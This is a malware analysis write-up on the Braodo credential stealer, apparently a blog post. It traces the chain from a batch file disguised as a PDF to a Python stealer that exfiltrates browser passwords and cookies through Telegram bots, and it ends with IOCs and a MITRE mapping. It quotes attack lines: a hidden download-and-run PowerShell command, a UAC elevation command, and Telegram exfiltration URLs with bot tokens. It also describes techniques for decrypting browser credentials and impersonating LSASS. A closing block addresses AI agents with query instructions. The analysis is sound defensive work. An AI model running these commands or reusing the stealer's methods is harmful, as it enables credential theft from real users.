# Braodo Analysis ## Executive Summary In this analysis, I examine a multi-stage malware campaign initiated through a deceptive batch file (`health-records-x-ray-pdf.bat`) masquerading as a PDF document. The campaign employs layered obfuscation, privilege escalation, scheduled task abuse, PowerShell-based payload delivery, Python obfuscation, and advanced cryptographic routines to harvest sensitive browser and application data. Stolen information—including credentials, cookies, and system metadata—is ultimately exfiltrated via hardcoded Telegram bot tokens. The infection chain begins with an obfuscated batch script that prompts for elevated privileges and downloads a secondary payload from a shortened URL. Subsequent stages rely on PowerShell to fetch disguised files from GitHub and GitLab, establish persistence through scheduled tasks, and execute a heavily obfuscated Python stealer (`prt.py`). The Python code leverages AES-GCM and AES-CBC decryption routines, extracting embedded payloads for runtime execution. Once deobfuscated, the Python stealer demonstrates a sophisticated architecture: it gathers host metadata, enumerates installed browsers and Discord clients, decrypts saved credentials and cookies using DPAPI and cryptographic key derivation, and unlocks locked browser files via Windows Restart Manager APIs. Credentials matching high-value keywords (Facebook, Gmail, Outlook, etc.) are filtered into separate files for attacker convenience. The malware compresses the stolen data into an in-memory ZIP archive with metadata tags and transmits it to attacker-controlled Telegram bots. To ensure stealth, it deletes temporary files and staging directories post-exfiltration. This operation highlights the evolution of credential-stealing malware toward multi-language payloads, layered obfuscation, and reliance on encrypted cloud-based exfiltration channels. ## Infection Chain

## Key Findings * **Initial Access via Fake BAT File** * Infection begins with `health-records-x-ray-pdf.bat`, disguised as a PDF. * Script performs privilege check; if lacking admin rights, it re-launches itself with elevated privileges using PowerShell `-Verb RunAs`. * **Stage 1 – Privilege Escalation & Persistence** * Downloads `rt3-9625.bat` via a shortened URL. * Establishes persistence through a scheduled task (`WindowsSecurityTask`) set to run at logon with high privileges. * Fetches a disguised `.png` (actually a batch payload) and a ZIP archive from GitHub/GitLab, extracting a Python stealer (`prt.py`). * **Stage 2 – Obfuscated Batch & Python Loader** * Further downloads (`u3t-9625.bat`) and executes payloads via hidden PowerShell windows. * Executes obfuscated `prt.py`, which contains embedded `.pyc` and `.pye` code encrypted with AES-GCM/AES-CBC. * **Stage 3 – Python Stealer (Deobfuscated)** * **System Profiling:** Collects hostname, username, OS, IP, and geolocation. * **Persistent Tracking:** Generates unique victim ID (`id.txt`) and maintains infection counter (`number.txt`). * **Browser Enumeration & Decryption:** * Chromium: Extracts DPAPI-protected master keys; decrypts AES-GCM/CBC credential blobs. * Gecko (Firefox, etc.): Uses PBKDF2/HMAC/3DES to decrypt logins. * Unlocks files via Windows Restart Manager to access locked cookie databases. * **Data Filtering & Storage:** Separates high-value credentials (Facebook, Gmail, Outlook) into `Important_Logins.txt` and cookies into `Facebook_Cookies.txt`. * **Advanced Capabilities** * **Privilege Escalation:** Includes LSASS impersonation for SYSTEM-level access. * **Crypto Functions:** Implements AES-GCM, AES-CBC, DPAPI, PBKDF2, and custom key blob parsing. * **Facebook Ad Account Hijacking:** Extracts session cookies, retrieves ad account info via Facebook Graph API. * **Exfiltration via Telegram** * Stolen data compressed into timestamped in-memory ZIP archive. * Sent via Telegram Bot API using **two hardcoded bot tokens** and rotating chat IDs. * Temporary data and archives are deleted post-exfiltration to minimize forensic traces. * **Stealth & Persistence** * Multi-layered obfuscation (batch + PowerShell + Python). * Fileless execution of decrypted payloads. * Scheduled task ensures persistence across reboots. * Cleans up artifacts to evade detection. ## Technical Analysis ### Stage 0: health-records-x-ray-pdf.bat

A batch file was used for initial access, disguised with the filename **`health-records-x-ray-pdf.bat`** to lure the victim into believing it was a legitimate PDF document

The content initially appeared as unreadable or garbled text—similar to Chinese characters—but this was due to an incorrect text encoding. After converting it to UTF-8, the content became legible and revealed structured code.

This batch script performs the following actions: 1. **Privilege Check & UAC Elevation:** * It first checks if the script is running with administrator privileges. * If not, it invokes a UAC prompt by using PowerShell with the `-Verb RunAs` flag to re-run itself with elevated privileges. * This is handled in the `askUAC` section using: ```powershell Start-Process -FilePath "%~f0" -ArgumentList elevated -Verb RunAs ``` 2. **Post-Elevation Execution:** * Once elevated, the script proceeds to the `afterAdmin` section. * It uses `cmd /c` to run a PowerShell command in a **hidden window** that downloads a secondary `.bat` payload from a shortened URL: ```powershell Invoke-WebRequest -Uri 'https://tinyurl.com/mh1-t3-9625' -OutFile "%TEMP%\rt3-9625.bat" ``` * The downloaded file is saved to the `%TEMP%` directory and executed, again with a hidden window via: ```cmd Start-Process -FilePath "%TEMP%\rt3-9625.bat" -WindowStyle Hidden ``` ### Stage 1: rt3-9625.bat The next batch file is obfuscated but contains recognizable labels like `askUAC` and `afterAdmin`, indicating a similar privilege escalation and execution flow as the previous script.

I deobfuscated the batch file using [DissectMalware’s `batch_deobfuscator`](https://github.com/DissectMalware/batch_deobfuscator) .

The above executables performs the following actions. 1. **Privilege Escalation:** * Uses the same method as the previous script (`askUAC`) to request elevated privileges via PowerShell with `-Verb RunAs`. 2. **Scheduled Task Creation:** * Creates a scheduled task named `WindowsSecurityTask` using `schtasks`, set to run at logon with the highest privileges. * The task points to a batch file located at: ``` C:\Users\\AppData\Local\Temp\WindowSecurity.bat ``` 3. **Payload Download & Execution:** * **First PowerShell Command:** * Sets the TLS protocol. * Downloads a `.png` file from GitHub (disguised `.bat`) and saves it to the same path used in the scheduled task (`WindowSecurity.bat`). * **Second PowerShell Command:** * Also sets TLS protocol. * Downloads a ZIP archive from GitLab. * Extracts its contents to `C:\Users\Public\Desktops`. * Sleeps for 1 second. * Executes a Python script (`prt.py`) using a Python interpreter included in the extracted contents. * Deletes the ZIP file afterward. ### Stage 2: WindowSecurity.bat and u3t-9625.bat

The script executes a `cmd` process that launches a hidden PowerShell command. This command downloads a `.png` file from a GitHub URL, saves it as a `.bat` file in the `%TEMP%` directory (`u3t-9625.bat`), and then executes it.

The script launches a PowerShell process with a hidden window, which executes the `prt.py` script located in the `Desktops` folder extracted earlier. Additionally, an investigation into the GitHub profile reveals that this is part of a recurring and ongoing campaign as the article by nullspike was posted on 19th of May 2025.

### Stage 3: prt.py

The Python file is heavily obfuscated using **Pyobfuscate**. Upon inspection, it contains embedded `.pyc` bytecode and even `.pye` encrypted code. I attempted multiple deobfuscation methods, including using Pyobfuscate's own deobfuscator and various public scripts and tools, but none were effective. Eventually, I came across an article by [**NullSpike**,](https://nullspike.com/blogs/GitHub-pages-serve-Braodo-Version-2-A-Python-based-Stealer/) where researcher [**Gurumoorthi**](https://www.linkedin.com/in/gurumoorthiramanathan) had published a Python-based deobfuscation script tailored for this type of obfuscation(Credits to him). I made slight modifications to his script to get it working in my environment.

This is the final deobfuscated code. It defines a decryption function `d(b, p)` that takes two inputs—`b` (the encrypted data) and `p` (the password or key material). It uses **AES-GCM** decryption with a key derived via **PBKDF2**, and a base85-decoded ciphertext. Once decrypted, it executes the result using `exec()`. If decryption via the `try` block fails, the `except` block defines an alternate AES-CBC-based `unpad()` function and attempts to decrypt and execute the second-stage payload using a different method, also based on structured values within the `pyobfuscate` object.\ \ I made my own script to do the same and write the output in a file for further investigation as you can see below.

The encryption key, `pyc` and `pye` code is present in the obfuscated code itself as you can see in the below snippet:

Reference Image To locate the key and code

#### Flow Overview **Initialization & Setup** * Defines string aliases, ImportantKeywords, and environment variables. * Prepares working directories under: ``` %TEMP%\Browsers Data ``` * Hardcodes Telegram bot tokens for exfiltration: * `7686322208:AAEqSm20vyfjVi6gz3MeY_Kouf1uGZcok` * `7529959374:AAHV5sS_Yzf3rpMs6akTn12ErTXQD0xANqw` **Persistent IDs & Counters** * `id()` creates or retrieves a unique 15-digit victim ID stored in: ``` %LOCALAPPDATA%\id.txt ``` * `Counter()` manages a session counter in: ``` %LOCALAPPDATA%\number.txt ``` **Gathering System Info** * `info()` collects computer name, username, OS version, IP, and geolocation (via `ipinfo.io`). * Provides metadata context for stolen data. **Browser & Discord Enumeration and Key Extraction** * Enumerates installed Chromium-based browsers, Gecko-based browsers, and Discord clients from AppData paths. * Uses `taskkill()` to close Chrome, Edge, Brave and unlock files. * Extracts browser master keys (`get_ch_master_key` for Chromium DPAPI, PBKDF2/HMAC/3DES for Gecko). **Credential & Cookie Decryption** * Decrypts Chromium credentials with `decrypt_ch_value()` (AES-GCM, CBC). * Decrypts Firefox/Gecko logins with `decrypt_pbe_password`, `getGeckoKey`, and `decrypt3DES`. * Filters stolen logins against **ImportantKeywords** (Facebook, Gmail, Outlook, etc.). **Data Storage & File Locks** * Saves credentials into: * `All_Passwords.txt` * `Important_Logins.txt` * Saves cookies into: * `Facebook_Cookies.txt` * `All_Cookies.txt` * Uses Windows Restart Manager API to unlock browser files. **Archiving Data** * Builds in-memory ZIP archive with staged files from `PathBrowser`. * Adds timestamp and bot reference as archive metadata. **Exfiltration via Telegram Bot API** * Writes ZIP archive to disk temporarily. * Prepares message with victim ID, country, username, cookie count, card data count. * Exfiltration sent through hardcoded Telegram endpoints: ``` https://api.telegram.org/bot7686322208:AAEqSm20vyfjVi6gz3MeY_Kouf1uGZcok/sendDocument https://api.telegram.org/bot7529959374:AAHV5sS_Yzf3rpMs6akTn12ErTXQD0xANqw/sendDocument ``` * Deletes archive and `%TEMP%\Browsers Data` after successful send. #### In Depth Analysis of the **deobfuscated** Code with snippets:-

* These variables are shorthand aliases for strings used later in the malware. * Example: * `_w = 'c_user'` → Used to identify Facebook session cookies. * `_t = 'facebook.com'` → Domain filter for Facebook cookies. * `_a = 'Facebook_Cookies.txt'` → Filename where stolen Facebook cookies are stored. * `_o` and `_n` are **hardcoded cryptographic keys** later used to help decrypt browser data.

It defines a list of **ImportantKeywords** that the stealer uses to filter “high-value” credentials such as Facebook, Gmail, Yahoo, Outlook, and other business-related accounts. Stolen logins matching these keywords are stored separately for quick attacker access. It then sets up environment variables (`LOCALAPPDATA`, `APPDATA`, `TEMP`, `USERPROFILE`) and constructs a working directory under the Temp folder called **Browsers Data**, where harvested data will be staged before exfiltration. Next, it declares **hardcoded Telegram bot tokens and chat IDs**: * `TOKEN_BOT_1 = "7686322208:AAEqSm20vyfjVi6gz3MeY_Kouf1uGZcok"` * `TOKEN_BOT_2 = "7529959374:AAHV5sS_Yzf3rpMs6akTn12ErTXQD0xANqw"` * Plus associated `CHAT_ID_NEW` and `CHAT_ID_RESET` values. These values represent the attacker’s **command-and-control infrastructure**.

This is the deobfuscated `id()` function. It builds a path to `id.txt` inside the user’s Local AppData (using environment variables defined earlier). If the file exists, it reads the stored value; if not, it generates a random 15-digit number, writes it to `id.txt`, and returns it.

This `info()` function gathers system and network details. It pulls the computer name, current username, and OS version, then queries `https://ipinfo.io` for IP address and geolocation data. The results are returned as a dictionary

This `Counter()` function manages a counter stored in `number.txt` inside the Local AppData path (similar to how `id.txt` was handled earlier). If the file exists, it reads the current number, increments it by one, and saves it back. If not, it initializes the value as `1`. The updated count is then returned and stored in the variable `Count`.

This section sets up browser data collection and master key extraction. * A dictionary `ch_dc_browsers` is defined, mapping multiple Chromium-based browsers (Chrome, Brave, Edge, Opera, Vivaldi, etc.) and Discord variants to their respective user-data directories under `AppData` or `LocalAppData`. * `taskkill()` is a helper that force-closes Chrome, Edge, or Brave processes to unlock files before stealing data. * `installed_ch_dc_browsers()` iterates over the dictionary and checks which browser/Discord paths exist, returning a list of installed targets. * `get_ch_master_key(path)` attempts to read a `Local State` file, decode the Base64-encoded `encrypted_key`, and use the `UnprotectData` function (Windows DPAPI) to recover the decryption key used for saved browser credentials.

This part handles credential decryption for browsers. * `decrypt_ch_value(buff, ch_master_key)` checks if saved browser values use AES-GCM or older CBC formats and decrypts them with the master key obtained earlier. * Additional helpers (`decrypt_pbe_password`, `getGeckoKey`, `decrypt3DES`) implement decryption for Firefox/Gecko-based browsers. They use PBKDF2, SHA1, and HMAC to derive keys from the global salt and master password, then decrypt saved logins with 3DES in CBC mode. * Together, these functions let the malware turn encrypted credential blobs from Chromium and Gecko browsers into plaintext usernames and passwords.

This part handles the **removal of file locks**, likely to access browser files such as cookie stores or login databases. The function `Unlock_Cookies(cookies_path)` uses the **Windows Restart Manager API** (via `rstrtmgr.dll`) to close applications that may have locked the target file path (`cookies_path`), such as running browser processes. * It starts a Restart Manager session with `RmStartSession`. * Then it **registers the cookie file as a resource** with `RmRegisterResources`. * `RmGetList` retrieves the list of applications locking the file. * If any are found, `RmShutdown` attempts to gracefully shut them down. * Finally, it ends the session with `RmEndSession`. This technique allows the malware to access and read locked browser files (e.g., cookies or login databases) by temporarily releasing OS-level locks without crashing the system or the browser.

The function `save_gck_login_data(profiles, profile_name, browser_name)` processes login credentials from Gecko-based browsers (like Firefox). * It parses the `logins.json` file in each profile directory, extracting saved credentials. * The `encryptedUsername` and `encryptedPassword` fields are decrypted using the previously retrieved decryption key and helper functions `decodeLoginData()` and `getKey()`. Once credentials are decrypted, the function: 1. **Prints the results**: including the URL, username, password, and browser profile. 2. **Performs keyword filtering**: * It loops through each saved credential and compares the URL against a predefined list of **ImportantKeywords** (e.g., facebook, gmail, yahoo, outlook). * Matches are stored in a file named `Important_Logins.txt` under a folder structure organized by browser name and profile. 3. **Saves all credentials**: * Regardless of filtering, all logins are saved to `All_Passwords.txt` for bulk exfiltration

This part handles **password extraction from Gecko-based browsers** like Firefox, Waterfox, Pale Moon, SeaMonkey, and others. 1. `get_gck_basepath(browser_type)` returns the appropriate base directory path for each supported Gecko-based browser by mapping `browser_type` to a specific path under `AppData`. 2. `get_gck_profiles(basepath)` reads the `profiles.ini` file in the browser’s base path and extracts all profile paths using regex. These profiles typically contain saved login credentials and browser data. 3. `get_gck_login_data(browser, path, profile_key)` loads `logins.json` from the login path and: * Decrypts stored credentials using `B_decrypt_v20` and the master key. * Extracts and formats each login entry: **origin\_url**, **username**, and **password**. Like before, it performs **ImportantKeywords filtering**: * High-value credentials (e.g., Facebook, Gmail) are saved to `Important_Logins.txt`. * All credentials are saved to `All_Passwords.txt`.

This function **retrieves and decrypts the Chrome browser’s encryption key** used to protect saved passwords. * It reads the `Local State` file to get the encrypted key. * Uses Windows **CryptUnprotectData** (via win32crypt) to decrypt it. * Connects to the Windows Service Manager to run some system commands for key extraction. * Finally, it returns the decrypted key in a format usable for decrypting Chrome passwords (AES-GCM or ChaCha20).

#### **Function decrypt\_v20()** * This function **decrypts data encrypted with AES-256-GCM**, such as browser cookies or passwords. * It extracts the **nonce** (initialization vector) and ciphertext from the encrypted value. * Uses the provided **key** to initialize an AES-GCM decryptor and decrypt the ciphertext. * Returns the decrypted plaintext or raw decoded string based on the `data_type`. #### **Function impersonate\_lsass**(context manager) * This function **elevates the script’s privilege to SYSTEM** by impersonating the `lsass.exe` process. * It obtains and duplicates the token from the `lsass.exe` process. * Enables debug privileges (`SeDebugPrivilege`) needed to interact with system processes. * Allows running code with SYSTEM-level permissions temporarily inside a `with` block. **Function parse\_key\_blob()** Parses a binary cryptographic key blob by reading its header and fields based on the blob type. It extracts key info needed for further decryption or processing. Raises an error if the blob format is unsupported.

Explaination of the above snippet * **decrypt\_with\_cng(input\_data):**\ Uses Windows CNG API to decrypt input data with different cryptographic providers and keys. * **byte\_xor(ba1, ba2):**\ Performs a byte-wise XOR operation on two byte arrays. * **derive\_v20\_master\_key(parsed\_data):**\ Derives the master key used for Chrome v20 encryption by parsing and processing input data. * **get\_encryption\_key\_2(browser\_path):**\ Retrieves and decrypts the Chrome encryption key using a different approach involving impersonation of LSASS and DPAPI.

**fetch\_passwords(login\_db\_path):**\ Connects to the browser’s SQLite login database and extracts saved credentials where passwords are encrypted with the `v20` encryption scheme. Returns a list of these login entries. **get\_ch\_cookies(browser, path, profile, key):**\ Collects cookies from the browser’s cookies database. For Edge and Brave, it kills running processes to unlock files. Queries SQLite to get cookie data, decrypts each cookie value, filters expired ones, and stores the results in a structured format.

**save\_gck\_cookies(profiles, profile\_name, browser\_name):** * Connects to the browser’s SQLite cookie database for each profile. * Extracts cookie details like host, path, name, value, expiry, security flags. * Filters cookies, particularly identifying Facebook cookies separately. * Formats and writes the cookies into text files in a designated directory (`PathBrowser`). * Keeps track of the number of saved cookies and updates a global counter.

#### Explanation of the above * **`__init__(self, cookie)`**\ Initializes with a cookie, sets up a `requests.Session` with custom headers, updates cookies, and retrieves a token. * **`Parse_Cookie(cookie)`**\ Parses the cookie string into a dictionary, filtering out some specific keys. * **`Get_Market()`**\ Requests Facebook Business content management API, extracts ad account ID and access token. * **`Get_info_Tkqc()`**\ Fetches detailed ad account info from Facebook Graph API, including spend cap, balance, account status, payment methods, etc. Returns a formatted summary string with key metrics. * **`ADS_Checker(B)`**\ Wrapper that calls `Get_info_Tkqc()` with error handling and returns ad account data.

* **Gets browser profiles** using `get_gck_profiles()` for multiple base paths. * **Loops through browsers:** * Sets browser path and checks for saved encryption key file. * Reads and decodes the key if it exists. * Otherwise, fetches keys with `get_encryption_key_2` and `get_encryption_key`. * Saves the key to a file if found. * **Finds profile folders** inside browser paths with `glob`. * **Processes each profile:** * Retrieves login data and cookie counts. * Saves cookies using `save_gck_cookies()`. * **Loops again through profiles:** * Determines profile names, handling some special cases. * **Reads Facebook cookies file:** * Counts lines containing `"c_user"` cookies. * **Exception handling** prevents crashes.

**Explanation for the above snippet:** * **Creates an in-memory ZIP archive** using `io.BytesIO()` and `zipfile.ZipFile`. * **Sets archive filename** based on the current date and time. * **Adds a comment** to the ZIP archive indicating the creation time and "Bot Telegram". * **Walks through the `PathBrowser` directory:** * Adds all files and directories inside `PathBrowser` to the ZIP archive, preserving their relative paths. * **Iterates through folders in `folders_to_archive`:** * Skips any subdirectories starting with `"user_data"`. * Walks through each folder’s files and directories. * Adds all files and directories to the ZIP, except `.zip` files. * **Adds any additional specified files in `files_to_archive`** to the ZIP archive. * **Exception handling** with `try-except` blocks prevents interruptions if files or directories cannot be accessed or written.

**Explanation of the above snippet:-** * **Writes the ZIP archive** from memory (`zip_data`) to disk at `archive_path` in binary mode. * **Prepares a message body** containing: * Country and ID info from `info` dictionary. * Username from the local system. * Cookie and card counts. * **Selects Telegram bot tokens and chat IDs** based on the `Count` variable. * **Sends the ZIP archive** to Telegram using a POST request to the Telegram Bot API `sendDocument` method: * Tries up to 10 times if sending fails. * Prints error messages on failure. * **Deletes the local archive file and directory** (`PathBrowser`) after successful sending. ## IOC | **URLs / Domains** | | | ----------------------- | ---------------------------------------------------------------------------------------------------------- | | | | | | | | | | | | Telegram API: | | | Telegram API: | | | Github User Profile:- | | **Telegram Bot Tokens** | 7686322208:AAEqSm20vyfjVi6gz3MeY\_Kouf1uGZcok | | | 7529959374:AAHV5sS\_Yzf3rpMs6akTn12ErTXQD0xANqw | | File Hashes |

health-records-x-ray-pdf.bat -
9021abcfd5a428db4c1bdb4b5ec3e3724de2591ef49bedc7ac40da060d957c23

| | | rt3-9625.bat - 353e89bbe60bce6e74969ce0f6ffa0fc9b2badbda24e81d31b03117cff3a5e0e | | |

WindowSecurity.bat -

f117d27d5d9a27c74bf5309db6994a14a6a87f7d320a43f95fca4c8d33572287

| | | u3t-9625.bat - 67c07b29b4d297a9b9b257836aafa613b86db7af398f53267a4f5074d41734fc | | | T3-9625.zip - 310fd8a487da7a5c023557a87862eca890db4efd8b6e31ad657634640ee267e5 | | | prt.py - ad3ed926ae11f3f1391b80d1ec793c9cdf176fc49c10945d1e505860bbedd279 | ## MITRE ATT\&CK MAPPING | **Initial Access** | T1204.002 – User Execution: Malicious File | | --------------------- | --------------------------------------------------------- | | **Execution** | T1059.003 – Windows Command Shell | | | T1059.001 – PowerShell | | | T1059.006 – Python | | **Persistence** | T1053.005 – Scheduled Task/Job: Scheduled Task | | **Defense Evasion** | T1027 – Obfuscated Files or Information | | | T1140 – Deobfuscate/Decode Files or Information | | | T1070.004 – Indicator Removal on Host: File Deletion | | **Credential Access** | T1555.003 – Credentials from Web Browsers | | | T1552.001 – Credentials in Files | | **Discovery** | T1082 – System Information Discovery | | | T1057 – Process Discovery | | **Collection** | T1005 – Data from Local System | | | T1114.001 – Local Email Collection | | **Exfiltration / C2** | T1048.003 – Exfiltration Over Unencrypted Non-C2 Protocol | | | T1071.001 – Application Layer Protocol: Web Protocols | --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://xto9ot.gitbook.io/malware-analysis/braodo-analysis.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.